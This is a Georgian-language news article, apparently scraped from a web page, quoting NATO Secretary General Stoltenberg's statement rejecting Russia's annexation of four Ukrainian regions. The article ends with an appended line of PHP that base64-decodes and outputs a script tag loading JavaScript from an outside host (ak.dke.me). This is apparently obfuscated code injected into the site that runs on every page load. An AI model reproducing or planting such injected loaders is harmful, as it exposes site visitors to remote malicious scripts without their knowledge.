celsiusi
ავერსი შნაიდერი
ნატოს გენერალურმა მდივანმა ცოტა ხნის წინ გამართულ საგანგებო ბრიფინგზე კიდევ ერთხელ დაადასტურა ომში მყოფი ქვეყნის ტერიტორიული მთლიანობისა და სუვერენიტეტის მხარდაჭრა და კიდევ ერთხელ დააკისრა ომის მიმდინარეობაზე პასუხისმგებლობა რუსეთს.
 
სტოლტენბერგმა დღევანდელ ანექსიასთან დაკავშირებით თქვა, რომ ნატოს წევრი ქვეყნები არ ცნობენ რუსეთის ნაწილად არც ერთ რეგიონს:
 
"ნატოს ქვეყნები არ ცნობენ არც ერთ ამ ტერიტორიას, როგორც რუსეთის ნაწილს. მოვუწოდებ ყველა ქვეყანას, უარყოს რუსეთის ყველა ეს დაპყრობითი ქმედება. ეს მიწები ეკუთვნის უკრაინას, დონეცკი უკრაინაა, ლუგანსკი უკრაინაა, უკრაინაა ხერსონი და ზაპოროჟიეც, ისევე როგორც ყირიმი.
 
უკვე მეორედ ხდება რუსეთის მიერ, ძალისმიერი დაპყრობა უკრაინის ტერიტორიის, მაგრამ ეს არ ცვლის კონფლიქტის არსს. ეს რჩება რუსეთის აგრესიულ ომად უკრაინის წინააღმდეგ და არ ცვლის ჩვენს განზრახვას მხარი დავუჭიროთ უკრაინას.
 
ნატო არ არის კონფლიქტის მხარე, მაგრამ ჩვენ მხარს ვუჭერთ უკრაინას მის თავდაცვით ომში. ჩვენი ალიანსი არის თავდაცვითი, ჩვენ ვართ ერთიანი რომ დავიცვათ ნატოს ყველა მოკავშირე და მათი მიწის ყოველი სანტიმეტრი, ეს საკვანძო მომენტია. პუტინმა მოახდინა ასობით ათასი ჯარისკაცის მობილიზება და ყოვლად უგუნურად აჟღარუნებს ბირთვულ იარაღს. ახლა კი უკრაინის ტერიტორიების ანექსირება მოახდინა. ჯამში, ეს წარმოადგენს ყველაზე სერიოზულ ესკალაციას ომის დაწყებიდან. ეს ყველაფერი მიუთითებს არა ძალაზე, არამედ სისუსტეზე , რომ ომი არ მიმდინარეობს ისე, როგორც პუტინმა დაგეგმა და ყველა სტრატეგიული მიზანი ჩაუვარდა. 
 
პუტინზე არის მთელი პასუხისმგებლობა ამ ომისა და ასევე მისი პასუხისმგებლობაა ამ ომის დასრულება, რომ შეაჩეროს მამაცი უკრაინელი ხალხის ტანჯვა, შეაჩეროს სასურსათო და ენერგეტიკული კრიზისი მთელი მსოფლიოს მასშტაბით.
 
თუ რუსეთი ომს შეწყვეტს, დამყარდება მშვიდობა, თუ უკრაინა შეწყვეტს - იგი შეწყვეტს არსებობას, როგორც დამოუკიდებელი სახელმწიფო. ნატო კვლავაც ადასტურებს უკრაინის ტერიტორიული მთლიანობის მხარდაჭერას, გავაგრძელებთ უკრაინისთვის მხარდაჭერას ომში რუსეთის აგრესიის წინააღმდეგ, იმდენი ხნის განმავლობაში, რამდენიც საჭირო იქნება." თქვა სტოლტენბერგმა
427
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");